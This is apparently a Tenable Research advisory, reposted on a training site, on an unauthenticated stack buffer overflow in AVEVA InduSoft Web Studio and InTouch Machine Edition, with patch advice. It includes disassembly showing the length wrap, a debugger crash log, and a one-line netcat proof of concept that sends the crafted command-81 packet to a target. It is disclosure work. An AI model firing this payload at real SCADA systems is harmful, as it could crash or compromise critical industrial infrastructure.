Tenable Research Advisory: Patches Issued For Critical Vulnerabilities in 2 AVEVA SCADA/OT Apps

Share and earn Cybytes
Facebook Twitter LinkedIn Email

A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.

What’s the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What’s the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.

What’s the solution? AVEVA has released InduSoft Web Studio Hotfix and InTouch Machine Edition Hotfix to address this vulnerability. Affected users should urgently apply the patches.


InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries — including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security — use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.


Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a ‘string’ from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of  command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

  1. The following object (referred here as ‘WSTR’) is used to store a wide-character string:
  2.  Class WSTR
     unsigned short lbuf[0x40]; // local storage for the string data
     void *pData; // ptr to string data; can point to @lbuf
     int32 DataLen; // length allocated for @pData

     When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.

    1. Another object heavily used in TCPServer.dll is the ‘TcpServerThreadBuffer’ (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.
    Class CBuf
     int32 AllocSize; // used for allocation, seen: 0x4000
     int32 CurPos; // current position
     int32 BufSize; // allocated size of @pBuffer
     void *pBuffer; // buffer holding network data; can point to @lbuf
     byte lbuf[0x100]; // local storage for network data

    Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

    The vulnerability can be triggered via command 81:

    .text:5D43D8B8      xor     eax, eax
    .text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
    .text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '';
    .text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
    .text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
    .text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
    .text:5D43D8DD      mov     [ebp+var_4], eax
    .text:5D43D8E0      mov     eax, [edi]
    .text:5D43D8E2      push    ecx
    .text:5D43D8E3      mov     ecx, edi
    .text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString

    Here, the code tries to read a ‘string’ object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

    Inside Cbuf_ReadString(), the length of the ‘string’ object is read, and the function tries to allocate str_len + 1 to store the string:

    .text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
    .text:5D40C062      mov     esi, [ebp+arg_sbuf]
    .text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
    .text:5D40C067      mov     ecx, esi
    .text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
    .text:5D40C06C      push    edx
    .text:5D40C06D      call    wstr_alloc

    If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:

    .text:5D40BDD4      mov     edx, [ebp+arg_size]
    .text:5D40BDD7      inc     edx ; size++
    .text:5D40BDD8      push    edi
    .text:5D40BDD9      mov     edi, ecx
    .text:5D40BDDB      mov     [ebp+arg_size], edx
    .text:5D40BDDE      cmp     edx, 40h
    .text:5D40BDE1      jge     short loc_5D40BDEF
    .text:5D40BDE3      mov     eax, 1

    Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes

    .text:5D40C09C      push    edi ; 0xffffffff
    .text:5D40C09D      push    ecx ; stack buf
    .text:5D40C09E      mov     ecx, ebx
    .text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!

    which can cause a stack buffer overflow:

    (9e8.b28): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
    eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    766ce331 cc              int     3
    0:020> kb
     # ChildEBP RetAddr  Args to Child              
    00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesInduSoft Web Studio v8.1BinTCPSERVER.DLL - 
    01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
    03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
    04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
    05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
    06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
    07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041

    Proof of Concept (PoC)

    Below is the PoC to trigger the stack buffer overflow:

    cat < (echo -ne 'x02x31x10x31x10x38x10x32x10x32x03x02x51xffxffxffxffxffxffxff'`python -c "print 'A'*1000"`'x03') - | nc <target_host> 1234

    Business impact

    These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

    AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.


    AVEVA has released updates InduSoft Web Studio Hotfix and InTouch Machine Edition Hotfix to remediate this vulnerability. Update the application by applying the appropriate patches:

Additional information

Share this post and earn Cybytes
Facebook Twitter LinkedIn Email
About Tenable
Tenable™, Inc. is the Cyber Exposure company. Over 24,000 organizations of all sizes around the globe rely on Tenable to manage and measure their modern attack surface to accurately understand and reduce cyber risk. As the creator of Nessus®, Tenable built its platform from the ground up to deeply understand assets, networks and vulnerabilities, extending this knowledge and expertise into Tenable.io™ to deliver the world’s first platform to provide live visibility into any asset on any computing platform. Tenable customers include over 50 percent of the Fortune 500, large government agencies and organizations across the private and public sectors. Learn more at tenable.com.
Promoted Content
Five Steps to Building a Successful Vulnerability Management Program
Is your vulnerability management program struggling? Despite proven technology solutions and the best efforts of IT teams, unresolved vulnerabilities remain an ongoing source of friction and frustration in many organizations. Regardless of how many vulnerabilities are fixed, there will always be vulnerabilities that can’t easily be remediated – and too often, finger-pointing between IT teams and business groups can ensue.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?